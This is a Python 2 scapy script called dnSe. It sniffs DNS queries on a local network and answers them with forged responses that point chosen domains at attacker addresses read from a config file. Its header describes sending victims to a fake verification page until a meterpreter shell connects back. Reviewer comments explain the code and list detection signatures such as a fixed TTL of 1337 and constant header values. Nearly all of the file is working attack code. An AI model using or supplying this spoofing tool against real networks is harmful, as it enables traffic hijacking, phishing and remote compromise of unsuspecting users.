# dnSe
# Author: St0rn
# Mail: bsoddigital@gmail.com
#
# Attack combining DNS spoofing with a fake page that asks for a
# security verification (SE). The page stays stuck on the
# "Verification Page" as long as the connection (meterpreter or other)
# is not established; once it is, the host in question is
# taken out of the DNS spoofing.
#
# argv[1] = shell port ; argv[2] = device
#
# NOTE(review): only the sniff-and-answer logic is in this file. The
# "verification" web page and the listener on argv[1] mentioned above
# are not part of the visible code.
# NOTE(review): Python 2 source (print statements, `thread` module).
# `string` and `thread` are imported but not used in the code shown.
#
#!usr/bin/env/python

import os
import sys
import string
import thread
from scapy.all import *

######################### List ########################

# Raw non-comment lines read from 'dns.spoof'.
file_list = []
# Source IPs seen sending TCP to the port given in argv[1]; DNS queries
# from these addresses are no longer answered by attack().
black_list = []
# Parallel lists filled by read_file(): entry i of each list comes from
# the same line of 'dns.spoof' (domain, record type, address to return).
domain = []
domain_type = []
spoof_ip = []

################## Read file Function #################

def read_file():
    """Load 'dns.spoof' from the current directory into the module lists.

    Lines whose first character is '#' are skipped. Every other line is
    split on single spaces and its first three fields are appended to
    domain, domain_type and spoof_ip (the newline is removed from the
    third field only). On any exception an error is printed and the
    process exits.
    """
    try:
        file = open('dns.spoof', 'r')
        while 1:
            line = file.readline()
            # readline() returns "" only at end of file.
            if line == "":
                break
            if line[0] != '#':
                file_list.append(line)
        file.close()
        for i in range(len(file_list)):
            split = file_list[i].split(" ")
            domain.append(split[0])
            domain_type.append(split[1])
            spoof_ip.append(split[2].replace("\n",""))
    # NOTE(review): bare except. As laid out here it also covers the
    # parsing loop, so a line with fewer than three space-separated
    # fields (a blank line, for example) raises IndexError and is
    # reported with the same "Can't open Domain File" message.
    except:
        print "\n\033[91mCan't open Domain File\033[0m"
        sys.exit()

################# DNS Spoofing Attack ###################

def attack(p):
    """Per-packet sniff callback: record "session" hosts, forge DNS answers.

    Two independent checks are applied to every sniffed packet p:

    1. An IP/TCP packet whose destination port equals int(sys.argv[1])
       and whose source IP is not yet in black_list gets its source IP
       appended to black_list. Only the destination port and the source
       address are examined; the destination address and the TCP flags
       are not.
    2. A UDP/DNS packet without a DNSRR layer (presumably a query rather
       than a response -- confirm) whose name is listed in `domain`, and
       whose source IP is not in black_list, is answered with a forged
       response built from the matching dns.spoof entry.
    """
    if p.haslayer(IP) and p.haslayer(TCP):
        if p[TCP].dport == int(sys.argv[1]) and p[IP].src not in black_list:
            black_list.append(p[IP].src)
            print "\n\033[92m Session Detected\033[0m"
    if p.haslayer(UDP) and p.haslayer(DNS) and not p.haslayer(DNSRR):
        l = len(p[DNS][DNSQR].qname)
        # qname[0:l-1] drops the last character of the queried name,
        # presumably the trailing dot of the FQDN -- confirm.
        # NOTE(review): the effect of the extra [0:l-1] applied to the
        # DNSQR layer itself cannot be determined from this file.
        if p[DNS][DNSQR][0:l-1].qname[0:l-1] in domain:
            if p[IP].src not in black_list:
                # The reply reuses the query's addressing with source and
                # destination swapped at the Ethernet, IP and UDP layers,
                # so it appears to come from the resolver that was asked.
                ether = Ether(dst = p[Ether].src, src = p[Ether].dst)
                ip = IP(dst = p[IP].src, src = p[IP].dst)
                udp = UDP(sport = p[UDP].dport, dport = p[UDP].sport)
                # Detection note: apart from the copied transaction id and
                # question section, every header value below is a constant
                # (rd = 0 and aa = 0 regardless of the query, opcode = 16,
                # z = 8), and the answer TTL further down is always 1337.
                # These fixed values are usable as a network signature.
                # NOTE(review): 16 and 8 look out of range for the standard
                # opcode and Z header fields; how scapy encodes them depends
                # on its version -- confirm before writing a byte-level rule.
                dns = DNS(id = p[DNS].id, qr = 1, opcode = 16, aa = 0, tc = 0, rd = 0, ra = 1, z = 8, rcode = 0, qdcount = 1, ancount = 1, nscount = 0, arcount = 0, qd = p[DNS].qd)
                # index() returns the first match, so if a domain is listed
                # twice in dns.spoof only its first entry is ever used.
                nb = domain.index(p[DNS][DNSQR].qname[0:l-1])
                dns.an = DNSRR(rrname = p[DNS][DNSQR].qname[0:l-1], type = domain_type[nb], rclass = "IN", ttl = 1337, rdata = spoof_ip[nb])
                payload = ether/ip/udp/dns
                # Nothing in this file suppresses the genuine resolver's
                # reply, so a monitored network would presumably see two
                # differing answers for the same transaction id -- a second
                # detection signal alongside the constants above. Validating
                # or encrypted DNS on the client removes the dependence on
                # unauthenticated UDP answers that this relies on.
                sendp(payload, verbose = 0, iface_hint = p[IP].src)
                print "\n\033[94m " + p[DNS][DNSQR].qname[0:l-1] + " answer by " + p[IP].src + " spoof to " + spoof_ip[nb] + "\033[0m"

######################### Main ###########################

# Fixed command string; no external input reaches the shell here.
os.system("clear")
if len(sys.argv) < 3:
    print "\nUsage: dnSe.py <Listen port> <interface>\n"
else:
    read_file()
    try:
        # No capture filter is passed, so attack() is invoked for every
        # packet seen on the interface named in argv[2].
        sniff(prn = attack, iface = sys.argv[2])
    # NOTE(review): bare except; any failure raised out of sniff(),
    # including one coming from the callback, is reported with the same
    # message.
    except:
        print "\n\033[91mCan't launch Attack sniffer :'(\033[0m"
        sys.exit()

###########################
#dns.spoof:
#
#The file must be laid out like this:
#Domain Type Spoof_IP
#Keep exactly one space between the
#fields
#Lines in the file can be commented out with #
#
St0rn